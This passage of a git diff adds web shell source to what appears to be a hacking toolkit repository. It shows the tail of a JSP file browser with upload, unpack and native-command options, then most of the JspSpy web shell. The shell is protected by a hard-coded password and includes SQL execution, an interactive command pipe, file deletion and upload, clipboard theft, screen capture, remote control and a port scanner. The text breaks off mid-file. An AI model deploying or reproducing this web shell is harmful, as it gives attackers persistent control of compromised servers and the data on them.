false; + } + else { + outs.write(i); + cr = false; + } + } + outs.flush(); + outs.close(); + } + } + request.setAttribute("dir", f.getParent()); + } + //Unpack file to the current directory without overwriting + else if (request.getParameter("unpackfile") != null) { + File f = new File(request.getParameter("unpackfile")); + String root = f.getParent(); + request.setAttribute("dir", root); + if (!isAllowed(new File(root), true)){ + request.setAttribute("error", "You are not allowed to access " + root); + } + //Check if file exists + else if (!f.exists()) { + request.setAttribute("error", "Cannot unpack " + f.getName() + + ", file does not exist"); + } + //Check if directory is readonly + else if (!f.getParentFile().canWrite()) { + request.setAttribute("error", "Cannot unpack " + 
f.getName() + + ", directory is write protected."); + } + //GZip + else if (f.getName().toLowerCase().endsWith(".gz")) { + //New name is old Name without .gz + String newName = f.getAbsolutePath().substring(0, f.getAbsolutePath().length() - 3); + try { + byte buffer[] = new byte[0xffff]; + copyStreams(new GZIPInputStream(new FileInputStream(f)), new FileOutputStream( + newName), buffer); + } + catch (IOException ex) { + request.setAttribute("error", "Unpacking of " + f.getName() + + " aborted. Error: " + ex); + } + } + //Else try Zip + else { + try { + ZipFile zf = new ZipFile(f); + Enumeration entries = zf.entries(); + //First check whether a file already exist + boolean error = false; + while (entries.hasMoreElements()) { + ZipEntry entry = (ZipEntry) entries.nextElement(); + if (!entry.isDirectory() + && new File(root + File.separator + entry.getName()).exists()) { + request.setAttribute("error", "Cannot unpack " + f.getName() + + ", File " + entry.getName() + " already exists."); + error = true; + break; + } + } + if (!error) { + //Unpack File + entries = zf.entries(); + byte buffer[] = new byte[0xffff]; + while (entries.hasMoreElements()) { + ZipEntry entry = (ZipEntry) entries.nextElement(); + File n = new File(root + File.separator + entry.getName()); + if (entry.isDirectory()) n.mkdirs(); + else { + n.getParentFile().mkdirs(); + n.createNewFile(); + copyStreams(zf.getInputStream(entry), new FileOutputStream(n), + buffer); + } + } + zf.close(); + request.setAttribute("message", "Unpack of " + f.getName() + + " was successful."); + } + } + catch (ZipException ex) { + request.setAttribute("error", "Cannot unpack " + f.getName() + + ", no valid zip file"); + } + catch (IOException ex) { + request.setAttribute("error", "Unpacking of " + f.getName() + + " aborted. 
Error: " + ex); + } + } + } + // Delete Files + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(DELETE_FILES))) { + Vector v = expandFileList(request.getParameterValues("selfile"), true); + boolean error = false; + //delete backwards + for (int i = v.size() - 1; i >= 0; i--) { + File f = (File) v.get(i); + if (!isAllowed(f, true)){ + request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); + error = true; + break; + } + if (!f.canWrite() || !f.delete()) { + request.setAttribute("error", "Cannot delete " + f.getAbsolutePath() + + ". Deletion aborted"); + error = true; + break; + } + } + if ((!error) && (v.size() > 1)) request.setAttribute("message", "All files deleted"); + else if ((!error) && (v.size() > 0)) request.setAttribute("message", "File deleted"); + else if (!error) request.setAttribute("error", "No files selected"); + } + // Create Directory + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(CREATE_DIR))) { + String dir = "" + request.getAttribute("dir"); + String dir_name = request.getParameter("cr_dir"); + String new_dir = getDir(dir, dir_name); + if (!isAllowed(new File(new_dir), true)){ + request.setAttribute("error", "You are not allowed to access " + new_dir); + } + else if (new File(new_dir).mkdirs()) { + request.setAttribute("message", "Directory created"); + } + else request.setAttribute("error", "Creation of directory " + new_dir + " failed"); + } + // Create a new empty file + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(CREATE_FILE))) { + String dir = "" + request.getAttribute("dir"); + String file_name = request.getParameter("cr_dir"); + String new_file = getDir(dir, file_name); + if (!isAllowed(new File(new_file), true)){ + request.setAttribute("error", "You are not allowed to access " + new_file); + } + // Test, if file_name is empty + else if (!"".equals(file_name.trim()) 
&& !file_name.endsWith(File.separator)) { + if (new File(new_file).createNewFile()) request.setAttribute("message", + "File created"); + else request.setAttribute("error", "Creation of file " + new_file + " failed"); + } + else request.setAttribute("error", "Error: " + file_name + " is not a valid filename"); + } + // Rename a file + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(RENAME_FILE))) { + Vector v = expandFileList(request.getParameterValues("selfile"), true); + String dir = "" + request.getAttribute("dir"); + String new_file_name = request.getParameter("cr_dir"); + String new_file = getDir(dir, new_file_name); + if (!isAllowed(new File(new_file), true)){ + request.setAttribute("error", "You are not allowed to access " + new_file); + } + // The error conditions: + // 1) Zero Files selected + else if (v.size() <= 0) request.setAttribute("error", + "Select exactly one file or folder. Rename failed"); + // 2a) Multiple files selected and the first isn't a dir + // Here we assume that expandFileList builds v from top-bottom, starting with the dirs + else if ((v.size() > 1) && !(((File) v.get(0)).isDirectory())) request.setAttribute( + "error", "Select exactly one file or folder. Rename failed"); + // 2b) If there are multiple files from the same directory, rename fails + else if ((v.size() > 1) && ((File) v.get(0)).isDirectory() + && !(((File) v.get(0)).getPath().equals(((File) v.get(1)).getParent()))) { + request.setAttribute("error", "Select exactly one file or folder. 
Rename failed"); + } + else { + File f = (File) v.get(0); + if (!isAllowed(f, true)){ + request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); + } + // Test, if file_name is empty + else if ((new_file.trim() != "") && !new_file.endsWith(File.separator)) { + if (!f.canWrite() || !f.renameTo(new File(new_file.trim()))) { + request.setAttribute("error", "Creation of file " + new_file + " failed"); + } + else request.setAttribute("message", "Renamed file " + + ((File) v.get(0)).getName() + " to " + new_file); + } + else request.setAttribute("error", "Error: \"" + new_file_name + + "\" is not a valid filename"); + } + } + // Move selected file(s) + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(MOVE_FILES))) { + Vector v = expandFileList(request.getParameterValues("selfile"), true); + String dir = "" + request.getAttribute("dir"); + String dir_name = request.getParameter("cr_dir"); + String new_dir = getDir(dir, dir_name); + if (!isAllowed(new File(new_dir), false)){ + request.setAttribute("error", "You are not allowed to access " + new_dir); + } + else{ + boolean error = false; + // This ensures that new_dir is a directory + if (!new_dir.endsWith(File.separator)) new_dir += File.separator; + for (int i = v.size() - 1; i >= 0; i--) { + File f = (File) v.get(i); + if (!isAllowed(f, true)){ + request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); + error = true; + break; + } + else if (!f.canWrite() || !f.renameTo(new File(new_dir + + f.getAbsolutePath().substring(dir.length())))) { + request.setAttribute("error", "Cannot move " + f.getAbsolutePath() + + ". 
Move aborted"); + error = true; + break; + } + } + if ((!error) && (v.size() > 1)) request.setAttribute("message", "All files moved"); + else if ((!error) && (v.size() > 0)) request.setAttribute("message", "File moved"); + else if (!error) request.setAttribute("error", "No files selected"); + } + } + // Copy Files + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(COPY_FILES))) { + Vector v = expandFileList(request.getParameterValues("selfile"), true); + String dir = (String) request.getAttribute("dir"); + if (!dir.endsWith(File.separator)) dir += File.separator; + String dir_name = request.getParameter("cr_dir"); + String new_dir = getDir(dir, dir_name); + if (!isAllowed(new File(new_dir), true)){ + request.setAttribute("error", "You are not allowed to access " + new_dir); + } + else{ + boolean error = false; + if (!new_dir.endsWith(File.separator)) new_dir += File.separator; + try { + byte buffer[] = new byte[0xffff]; + for (int i = 0; i < v.size(); i++) { + File f_old = (File) v.get(i); + File f_new = new File(new_dir + f_old.getAbsolutePath().substring(dir.length())); + if (!isAllowed(f_old, false)|| !isAllowed(f_new, true)){ + request.setAttribute("error", "You are not allowed to access " + f_new.getAbsolutePath()); + error = true; + } + else if (f_old.isDirectory()) f_new.mkdirs(); + // Overwriting is forbidden + else if (!f_new.exists()) { + copyStreams(new FileInputStream(f_old), new FileOutputStream(f_new), buffer); + } + else { + // File exists + request.setAttribute("error", "Cannot copy " + f_old.getAbsolutePath() + + ", file already exists. Copying aborted"); + error = true; + break; + } + } + } + catch (IOException e) { + request.setAttribute("error", "Error " + e + ". 
Copying aborted"); + error = true; + } + if ((!error) && (v.size() > 1)) request.setAttribute("message", "All files copied"); + else if ((!error) && (v.size() > 0)) request.setAttribute("message", "File copied"); + else if (!error) request.setAttribute("error", "No files selected"); + } + } + // Directory viewer + if (dir_view && request.getAttribute("dir") != null) { + File f = new File("" + request.getAttribute("dir")); + //Check, whether the dir exists + if (!f.exists() || !isAllowed(f, false)) { + if (!f.exists()){ + request.setAttribute("error", "Directory " + f.getAbsolutePath() + " does not exist."); + } + else{ + request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); + } + //if attribute olddir exists, it will change to olddir + if (request.getAttribute("olddir") != null && isAllowed(new File((String) request.getAttribute("olddir")), false)) { + f = new File("" + request.getAttribute("olddir")); + } + //try to go to the parent dir + else { + if (f.getParent() != null && isAllowed(f, false)) f = new File(f.getParent()); + } + //If this dir also do also not exist, go back to browser.jsp root path + if (!f.exists()) { + String path = null; + if (application.getRealPath(request.getRequestURI()) != null) path = new File( + application.getRealPath(request.getRequestURI())).getParent(); + + if (path == null) // handle the case were we are not in a directory (ex: war file) + path = new File(".").getAbsolutePath(); + f = new File(path); + } + if (isAllowed(f, false)) request.setAttribute("dir", f.getAbsolutePath()); + else request.setAttribute("dir", null); + } +%> + +<%=request.getAttribute("dir")%> + + +<% + //Output message + if (request.getAttribute("message") != null) { + out.println("
    "); + out.println(request.getAttribute("message")); + out.println("
    "); + } + //Output error + if (request.getAttribute("error") != null) { + out.println("
    "); + out.println(request.getAttribute("error")); + out.println("
    "); + } + if (request.getAttribute("dir") != null){ +%> + +
    + Filename filter: +

    + +<% + // Output the table, starting with the headers. + String dir = URLEncoder.encode("" + request.getAttribute("dir")); + String cmd = browser_name + "?dir=" + dir; + int sortMode = 1; + if (request.getParameter("sort") != null) sortMode = Integer.parseInt(request + .getParameter("sort")); + int[] sort = new int[] {1, 2, 3, 4}; + for (int i = 0; i < sort.length; i++) + if (sort[i] == sortMode) sort[i] = -sort[i]; + out.print("" + + "" + + "" + + "" + + ""); + if (!READ_ONLY) out.print (""); + out.println(""); + char trenner = File.separatorChar; + // Output the Root-Dirs, without FORBIDDEN_DRIVES + File[] entry = File.listRoots(); + for (int i = 0; i < entry.length; i++) { + boolean forbidden = false; + for (int i2 = 0; i2 < FORBIDDEN_DRIVES.length; i2++) { + if (entry[i].getAbsolutePath().toLowerCase().equals(FORBIDDEN_DRIVES[i2])) forbidden = true; + } + if (!forbidden) { + out.println(""); + out.println(""); + } + } + // Output the parent directory link ".." + if (f.getParent() != null) { + out.println(""); + out.println(""); + } + // Output all files and dirs and calculate the number of files and total size + entry = f.listFiles(); + if (entry == null) entry = new File[] {}; + long totalSize = 0; // The total size of the files in the current directory + long fileCount = 0; // The count of files in the current working directory + if (entry != null && entry.length > 0) { + Arrays.sort(entry, new FileComp(sortMode)); + for (int i = 0; i < entry.length; i++) { + String name = URLEncoder.encode(entry[i].getAbsolutePath()); + String type = "File"; // This String will tell the extension of the file + if (entry[i].isDirectory()) type = "DIR"; // It's a DIR + else { + String tempName = entry[i].getName().replace(' ', '_'); + if (tempName.lastIndexOf('.') != -1) type = tempName.substring( + tempName.lastIndexOf('.')).toLowerCase(); + } + String ahref = ""; + String link = buf; // The standard view link, uses Mime-type + if (entry[i].isDirectory()) { + if 
(entry[i].canRead() && USE_DIR_PREVIEW) { + //Show the first DIR_PREVIEW_NUMBER directory entries in a tooltip + File[] fs = entry[i].listFiles(); + if (fs == null) fs = new File[] {}; + Arrays.sort(fs, new FileComp()); + StringBuffer filenames = new StringBuffer(); + for (int i2 = 0; (i2 < fs.length) && (i2 < 10); i2++) { + String fname = conv2Html(fs[i2].getName()); + if (fs[i2].isDirectory()) filenames.append("[" + fname + "];"); + else filenames.append(fname + ";"); + } + if (fs.length > DIR_PREVIEW_NUMBER) filenames.append("..."); + else if (filenames.length() > 0) filenames + .setLength(filenames.length() - 1); + link = ahref + "dir=" + name + "\" title=\"" + filenames + "\">" + + FOL_IMG + "[" + buf + "]"; + } + else if (entry[i].canRead()) { + link = ahref + "dir=" + name + "\">" + FOL_IMG + "[" + buf + "]"; + } + else link = FOL_IMG + "[" + buf + "]"; + } + else if (entry[i].isFile()) { //Entry is file + totalSize = totalSize + entry[i].length(); + fileCount = fileCount + 1; + if (entry[i].canRead()) { + dlink = ahref + "downfile=" + name + "\">Download"; + //If you click at the filename + if (USE_POPUP) link = ahref + "file=" + name + "\" target=\"_blank\">" + + buf + ""; + else link = ahref + "file=" + name + "\">" + buf + ""; + if (entry[i].canWrite()) { // The file can be edited + //If it is a zip or jar File you can unpack it + if (isPacked(name, true)) elink = ahref + "unpackfile=" + name + + "\">Unpack"; + else elink = ahref + "editfile=" + name + "\">Edit"; + } + else { // If the file cannot be edited + //If it is a zip or jar File you can unpack it + if (isPacked(name, true)) elink = ahref + "unpackfile=" + name + + "\">Unpack"; + else elink = ahref + "editfile=" + name + "\">View"; + } + } + else { + link = buf; + } + } + String date = dateFormat.format(new Date(entry[i].lastModified())); + out.println(""); + if (entry[i].canRead()) { + out.println(""); + } + else { + out.println(""); + } + out.print(""); + if (entry[i].isDirectory()) 
out.print(""); + else { + out.print(""); + } + out.println(""); // The download link + if (!READ_ONLY) + out.print (""); // The edit link (or view, depending) + out.println(""); + } + }%> +
     NameSizeTypeDate  
     "); + String name = URLEncoder.encode(entry[i].getAbsolutePath()); + String buf = entry[i].getAbsolutePath(); + out.println("  [" + buf + "]"); + out.print("    
    "); + out.println("  " + FOL_IMG + "[..]"); + out.print("    
     " + link + " " + + convertFileSize(entry[i].length()) + "" + type + "  " + // The file type (extension) + date + "" + // The date the file was created + dlink + "" + elink + "
    + Select all +

    + + <%=convertFileSize(totalSize)%> in <%=fileCount%> files in <%= dir2linkdir((String) request.getAttribute("dir"), browser_name, sortMode)%> + +

    + "> + + + <% if (!READ_ONLY) {%> + + <% } %> + <% if (!READ_ONLY) {%> +
    + + + + + + + <% } %> +
    +
    +
    + <% if (ALLOW_UPLOAD) { %> +
    + "> + + + +
    + <%} %> + <% if (NATIVE_COMMANDS) {%> +
    + "> + + + +
    <% + }%> +
    + <%}%> +
    +
    + jsp File Browser version <%= VERSION_NR%> by www.vonloesch.de +
    +
+<%
+ }
+%>
diff --git a/jsp/hackk8/JSP/other/jspspy.jsp b/jsp/hackk8/JSP/other/jspspy.jsp
new file mode 100644
index 0000000..219d801
--- /dev/null
+++ b/jsp/hackk8/JSP/other/jspspy.jsp
@@ -0,0 +1,2329 @@ +<%@page pageEncoding="UTF-8"%> +<%@page import="java.io.*"%> +<%@page import="java.util.*"%> +<%@page import="java.util.regex.*"%> +<%@page import="java.sql.*"%> +<%@page import="java.nio.charset.*"%> +<%@page import="javax.servlet.http.HttpServletRequestWrapper"%> +<%@page import="java.text.*"%> +<%@page import="java.net.*"%> +<%@page import="java.util.zip.*"%> +<%@page import="java.awt.*"%> +<%@page import="java.awt.image.*"%> +<%@page import="javax.imageio.*"%> +<%@page import="java.awt.datatransfer.DataFlavor"%> +<%@page import="java.util.prefs.Preferences"%> +<%! +/** +* Code By admin +* Date 2009-12-17 +* Blog http://www.baidu.com/ +* Huan . I Love You. +*/ +private static final String PW = "max"; //password +private static final String PW_SESSION_ATTRIBUTE = "JspSpyPwd"; +private static final String REQUEST_CHARSET = "ISO-8859-1"; +private static final String PAGE_CHARSET = "UTF-8"; +private static final String CURRENT_DIR = "currentdir"; +private static final String MSG = "SHOWMSG"; +private static final String PORT_MAP = "PMSA"; +private static final String DBO = "DBO"; +private static final String SHELL_ONLINE = "SHELL_ONLINE"; +private static String SHELL_NAME = ""; +private static String WEB_ROOT = null; +private static String SHELL_DIR = null; +public static Map ins = new HashMap(); +private static class MyRequest extends HttpServletRequestWrapper { +public MyRequest(HttpServletRequest req) { +super(req); +} +public String getParameter(String name) { +try { +String value = super.getParameter(name); +if (name == null) +return null; +return new String(value.getBytes(REQUEST_CHARSET),PAGE_CHARSET); +} catch (Exception e) { +return null; +} +} +} +private static class DBOperator{ +private Connection conn = null; +private Statement stmt = null; +private String driver; +private String url; +private String uid; +private String pwd; +public DBOperator(String driver,String url,String uid,String pwd) throws Exception { 
+this(driver,url,uid,pwd,false); +} +public DBOperator(String driver,String url,String uid,String pwd,boolean connect) throws Exception { +Class.forName(driver); +if (connect) +this.conn = DriverManager.getConnection(url,uid,pwd); +this.url = url; +this.driver = driver; +this.uid = uid; +this.pwd = pwd; +} +public void connect() throws Exception{ +this.conn = DriverManager.getConnection(url,uid,pwd); +} +public Object execute(String sql) throws Exception { +if (isValid()) { +stmt = conn.createStatement(); +if (stmt.execute(sql)) { +return stmt.getResultSet(); +} else { +return stmt.getUpdateCount(); +} +} +throw new Exception("Connection is inValid."); +} +public void closeStmt() throws Exception{ +if (this.stmt != null) +stmt.close(); +} +public boolean isValid() throws Exception { +return conn != null && !conn.isClosed(); +} +public void close() throws Exception { +if (isValid()) { +closeStmt(); +conn.close(); +} +} +public boolean equals(Object o) { +if (o instanceof DBOperator) { +DBOperator dbo = (DBOperator)o; +return this.driver.equals(dbo.driver) && this.url.equals(dbo.url) && this.uid.equals(dbo.uid) && this.pwd.equals(dbo.pwd); +} +return false; +} +} +private static class StreamConnector extends Thread { +private InputStream is; +private OutputStream os; +public StreamConnector( InputStream is, OutputStream os ){ +this.is = is; +this.os = os; +} +public void run(){ +BufferedReader in = null; +BufferedWriter out = null; +try{ +in = new BufferedReader( new InputStreamReader(this.is)); +out = new BufferedWriter( new OutputStreamWriter(this.os)); +char buffer[] = new char[8192]; +int length; +while((length = in.read( buffer, 0, buffer.length ))>0){ +out.write( buffer, 0, length ); +out.flush(); +} +} catch(Exception e){} +try{ +if(in != null) +in.close(); +if(out != null) +out.close(); +} catch( Exception e ){} +} +} +private static class OnLineProcess { +private String cmd = "first"; +private Process pro; +public OnLineProcess(Process p){ +this.pro = p; +} 
+public void setPro(Process p) { +this.pro = p; +} +public void setCmd(String c){ +this.cmd = c; + +} +public String getCmd(){ +return this.cmd; +} +public Process getPro(){ +return this.pro; +} +public void stop(){ +this.pro.destroy(); +} +} +private static class OnLineConnector extends Thread { +private OnLineProcess ol = null; +private InputStream is; +private OutputStream os; +private String name; +public OnLineConnector( InputStream is, OutputStream os ,String name,OnLineProcess ol){ +this.is = is; +this.os = os; +this.name = name; +this.ol = ol; +} +public void run(){ +BufferedReader in = null; +BufferedWriter out = null; +try{ +in = new BufferedReader( new InputStreamReader(this.is)); +out = new BufferedWriter( new OutputStreamWriter(this.os)); +char buffer[] = new char[128]; +if(this.name.equals("exeRclientO")) { +//from exe to client +int length = 0; +while((length = in.read( buffer, 0, buffer.length ))>0){ +String str = new String(buffer, 0, length); +str = str.replace("&","&").replace("<","<").replace(">",">"); +str = str.replace(""+(char)13+(char)10,"
    "); +str = str.replace("\n","
    "); +out.write(str.toCharArray(), 0, str.length()); +out.flush(); +} +} else { +//from client to exe +while(true) { +while(this.ol.getCmd() == null) { +Thread.sleep(500); +} +if (this.ol.getCmd().equals("first")) { +this.ol.setCmd(null); +continue; +} +this.ol.setCmd(this.ol.getCmd() + (char)10); +char[] arr = this.ol.getCmd().toCharArray(); +out.write(arr,0,arr.length); +out.flush(); +this.ol.setCmd(null); +} +} +} catch(Exception e){ +} +try{ +if(in != null) +in.close(); +if(out != null) +out.close(); +} catch( Exception e ){ +} +} +} +private static class Table{ +private ArrayList rows = null; +private boolean echoTableTag = false; +public void setEchoTableTag(boolean v) { +this.echoTableTag = v; +} +public Table(){ +this.rows = new ArrayList(); +} +public void addRow(Row r) { +this.rows.add(r); +} +public String toString(){ +StringBuilder html = new StringBuilder(); +if (echoTableTag) +html.append(""); +for (Row r:rows) { +html.append(""); +for (Column c:r.getColumns()) { +html.append(""); +} +html.append(""); +} +if (echoTableTag) +html.append("
    "); +String vv = Util.htmlEncode(Util.getStr(c.getValue())); +if (vv.equals("")) +vv = " "; +html.append(vv); +html.append("
    "); +return html.toString(); +} +} +private static class Row{ +private ArrayList cols = null; +public Row(){ +this.cols = new ArrayList(); +} +public void addColumn(Column n) { +this.cols.add(n); +} +public ArrayList getColumns(){ +return this.cols; +} +} +private static class Column{ +private String value; +public Column(String v){ +this.value = v; +} +public String getValue(){ +return this.value; +} +} +private static class Util{ +public static boolean isEmpty(String s) { +return s == null || s.trim().equals(""); +} +public static boolean isEmpty(Object o) { +return o == null || isEmpty(o.toString()); +} +public static String getSize(long size,char danwei) { +if (danwei == 'M') { +double v = formatNumber(size / 1024.0 / 1024.0,2); +if (v > 1024) { +return getSize(size,'G'); +}else { +return v + "M"; +} +} else if (danwei == 'G') { +return formatNumber(size / 1024.0 / 1024.0 / 1024.0,2)+"G"; +} else if (danwei == 'K') { +double v = formatNumber(size / 1024.0,2); +if (v > 1024) { +return getSize(size,'M'); +} else { +return v + "K"; +} +} else if (danwei == 'B') { +if (size > 1024) { +return getSize(size,'K'); +}else { +return size + "B"; +} +} +return ""+0+danwei; +} +public static double formatNumber(double value,int l) { +NumberFormat format = NumberFormat.getInstance(); +format.setMaximumFractionDigits(l); +format.setGroupingUsed(false); +return new Double(format.format(value)); +} +public static boolean isInteger(String v) { +if (isEmpty(v)) +return false; +return v.matches("^\\d+$"); +} +public static String formatDate(long time) { +SimpleDateFormat format = new SimpleDateFormat("yyyy-MM-dd hh:mm:ss"); +return format.format(new java.util.Date(time)); +} +public static String convertPath(String path) { +return path != null ? path.replace("\\","/") : ""; +} +public static String htmlEncode(String v) { +if (isEmpty(v)) +return ""; +return v.replace("&","&").replace("<","<").replace(">",">"); +} +public static String getStr(String s) { +return s == null ? 
"" :s; +} +public static String getStr(Object s) { +return s == null ? "" :s.toString(); +} +public static String exec(String regex, String str, int group) { +Pattern pat = Pattern.compile(regex); +Matcher m = pat.matcher(str); +if (m.find()) +return m.group(group); +return null; +} +public static void outMsg(Writer out,String msg) throws Exception { +outMsg(out,msg,"center"); +} +public static void outMsg(Writer out,String msg,String align) throws Exception { +if (msg.indexOf("java.lang.ClassNotFoundException") != -1) +msg = "Can Not Find The Driver!
    " + msg; +out.write("
    "+msg+"
    "); +} +} +private static class UploadBean { +private String fileName = null; +private String suffix = null; +private String savePath = ""; +private ServletInputStream sis = null; +private byte[] b = new byte[1024]; +public UploadBean() { +} +public void setSavePath(String path) { +this.savePath = path; +} +public void parseRequest(HttpServletRequest request) throws IOException { +sis = request.getInputStream(); +int a = 0; +int k = 0; +String s = ""; +while ((a = sis.readLine(b,0,b.length))!= -1) { +s = new String(b, 0, a,PAGE_CHARSET); +if ((k = s.indexOf("filename=\""))!= -1) { +s = s.substring(k + 10); +k = s.indexOf("\""); +s = s.substring(0, k); +File tF = new File(s); +if (tF.isAbsolute()) { +fileName = tF.getName(); +} else { +fileName = s; +} +k = s.lastIndexOf("."); +suffix = s.substring(k + 1); +upload(); +} +} +} +private void upload() { +try { +FileOutputStream out = new FileOutputStream(new File(savePath,fileName)); +int a = 0; +int k = 0; +String s = ""; +while ((a = sis.readLine(b,0,b.length))!=-1) { +s = new String(b, 0, a); +if ((k = s.indexOf("Content-Type:"))!=-1) { +break; +} +} +sis.readLine(b,0,b.length); +while ((a = sis.readLine(b,0,b.length)) != -1) { +s = new String(b, 0, a); +if ((b[0] == 45) && (b[1] == 45) && (b[2] == 45) && (b[3] == 45) && (b[4] == 45)) { +break; +} +out.write(b, 0, a); +} +out.close(); +} catch (IOException ioe) { +ioe.printStackTrace(); +} +} +} +%> +<% +SHELL_NAME = request.getServletPath().substring(request.getServletPath().lastIndexOf("/")+1); +String myAbsolutePath = application.getRealPath(request.getServletPath()); +if (Util.isEmpty(myAbsolutePath)) {//for weblogic +SHELL_NAME = request.getServletPath(); +myAbsolutePath = new File(application.getResource("/").getPath()+SHELL_NAME).toString(); +SHELL_NAME=request.getContextPath()+SHELL_NAME; +WEB_ROOT = new File(application.getResource("/").getPath()).toString(); +} else { +WEB_ROOT = application.getRealPath("/"); +} +SHELL_DIR = 
Util.convertPath(myAbsolutePath.substring(0,myAbsolutePath.lastIndexOf(File.separator))); +if (session.getAttribute(CURRENT_DIR) == null) +session.setAttribute(CURRENT_DIR,Util.convertPath(SHELL_DIR)); +request = new MyRequest(request); +if (session.getAttribute(PW_SESSION_ATTRIBUTE) == null || !(session.getAttribute(PW_SESSION_ATTRIBUTE)).equals(PW)) { +String o = request.getParameter("o"); +if (o != null && o.equals("login")) { +ins.get("login").invoke(request,response,session); +return; +} else if (o != null && o.equals("vLogin")) { +ins.get("vLogin").invoke(request,response,session); +return; +} else { +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +return; +} +} +%> +<%! +private static interface Invoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception; +public boolean doBefore(); +public boolean doAfter(); +} +private static class DefaultInvoker implements Invoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { +} +public boolean doBefore(){ +return true; +} +public boolean doAfter() { +return true; +} +} +private static class ScriptInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); + +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BeforeInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("JspSpy Codz By - Ninty"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class AfterInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { 
+PrintWriter out = response.getWriter(); +out.println(""); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DeleteBatchInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String files = request.getParameter("files"); +if (!Util.isEmpty(files)) { +String currentDir = JSession.getAttribute(CURRENT_DIR).toString(); +String[] arr = files.split(","); +for (String fs:arr) { +File f = new File(currentDir,fs); +f.delete(); +} +} +JSession.setAttribute(MSG,"Delete Files Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class ClipBoardInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""+ +" "+ +" "+ +" "+ +"
    "+ +"

    System Clipboard »

    "+ +"

    ");
    +try{
    +out.println(Util.htmlEncode(Util.getStr(Toolkit.getDefaultToolkit().getSystemClipboard().getData(DataFlavor.stringFlavor))));
    +}catch (Exception ex) {
    +out.println("ClipBoard is Empty Or Is Not Text Data !");
    +}
    +out.println("
    "+ +" "+ +"

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VRemoteControlInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +out.println(""+ +" "+ +" "+ +" "+ +"
    "+ +"

    Remote Control »

    "+ +" Speed(Second , dont be so fast) Can Not Control Yet."+ +"

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//GetScreen +private static class GcInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Dimension size = Toolkit.getDefaultToolkit().getScreenSize(); +Rectangle rec = new Rectangle(0,0,(int)size.getWidth(),(int)size.getHeight()); +BufferedImage img = new Robot().createScreenCapture(rec); +response.setContentType("image/jpeg"); +ImageIO.write(img,"jpg",response.getOutputStream()); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VPortScanInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String ip = request.getParameter("ip"); +String ports = request.getParameter("ports"); +String timeout = request.getParameter("timeout"); +if (Util.isEmpty(ip)) +ip = "127.0.0.1"; +if (Util.isEmpty(ports)) +ports = "21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500"; +if (Util.isEmpty(timeout)) +timeout = "2"; +out.println("
    "+ +"

    PortScan >>

    "+ +"
    "+ +"

    "+ +"IP : Port : Timeout (秒) : "+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class PortScanInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +ins.get("vPortScan").invoke(request,response,JSession); +String ip = request.getParameter("ip"); +String ports = request.getParameter("ports"); +String timeout = request.getParameter("timeout"); +int iTimeout = 0; +if (Util.isEmpty(ip) || Util.isEmpty(ports)) +return; +if (!Util.isInteger(timeout)) { +timeout = "2"; +} +iTimeout = Integer.parseInt(timeout); +Map rs = new LinkedHashMap(); +String[] portArr = ports.split(","); +for (String port:portArr) { +try { +Socket s = new Socket(); +s.connect(new InetSocketAddress(ip,Integer.parseInt(port)),iTimeout); +s.close(); +rs.put(port,"Open"); +} catch (Exception e) { +rs.put(port,"Close"); +} +} +out.println("
    "); +Set> entrySet = rs.entrySet(); +for (Map.Entry e:entrySet) { +String port = e.getKey(); +String value = e.getValue(); +out.println(ip+" : "+port+" ................................. "+value+"
    "); +} +out.println("
